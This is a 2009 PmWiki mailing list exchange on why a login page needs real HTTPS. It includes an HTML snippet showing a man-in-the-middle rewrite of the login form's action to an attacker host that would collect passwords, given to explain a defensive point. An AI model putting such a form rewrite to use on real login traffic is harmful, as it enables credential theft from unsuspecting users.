[pmwiki-users] security (again!)
ollebe at student.chalmers.se
Mon Mar 9 16:23:58 CDT 2009
Agreed, but much more important is the fact that the user knows that he is
seeing the real login page. Without true HTTPS (with a trusted certificate)
the user don't know if his connection has been tampered with so that he's
visiting a phising site. That phising site could look just like the original,
and seem to be located at the same URL. But it could send the password to the
attacker's web application instead of to the PmWiki.
Original page at adress http://mywiki.somewhery6ne6un4ue.org/wiki/pmwiki.php:
^ Notice there's no httpS in that URL
<form action="https://mywiki.somewhere.org/wiki/pmwiki.php"> Your password is
SOO secure, coz i'm using HTTPS!!11
<input bla bla ....
Gets modified, while on the network, to the phising page, which still seems to
be at http://mywiki.somewhere.org/wiki/pmwiki.php:
<form action="http://attacker.evilstuff45yn45yuns3.com/wiki/pmwiki.php"> Your
password is SOO secure, co< i'm using HTTPS!!11
<input bla bla.. ...
And the attacker would get the password.
On Monday 09 March 2009 21.32.49 James M wrote:
> Yes my feeling exactly. I was considering changing the login page to point
> out that the passwords would be sent encrypted. But having https in the
> address bar (and coloured yellow if you use some browsers) would be much
> On Mon, Mar 9, 2009 at 6:21 PM, Randy Brown <randy at brownragfilms.com> wrote:
> > A user may want assurance before typing a password that the password
> > will not be sent in the clear. Seeing "https" in the browser's address
> > bar is reassuring.
> > Randy
> > On Mar 9, 2009, at 1:10 PM, Guillermo Calderon - INCO wrote:
> > > ¿Can you explain better this point?.
> > > I don't see why it is necessary to send the login page encrypted
> > _______________________________________________
> > pmwiki-users mailing list
> > pmwiki-users at pmichaud.com
> > http://www.pmichaud.com/mailman/listinfo/pmwiki-users
More information about the pmwiki-users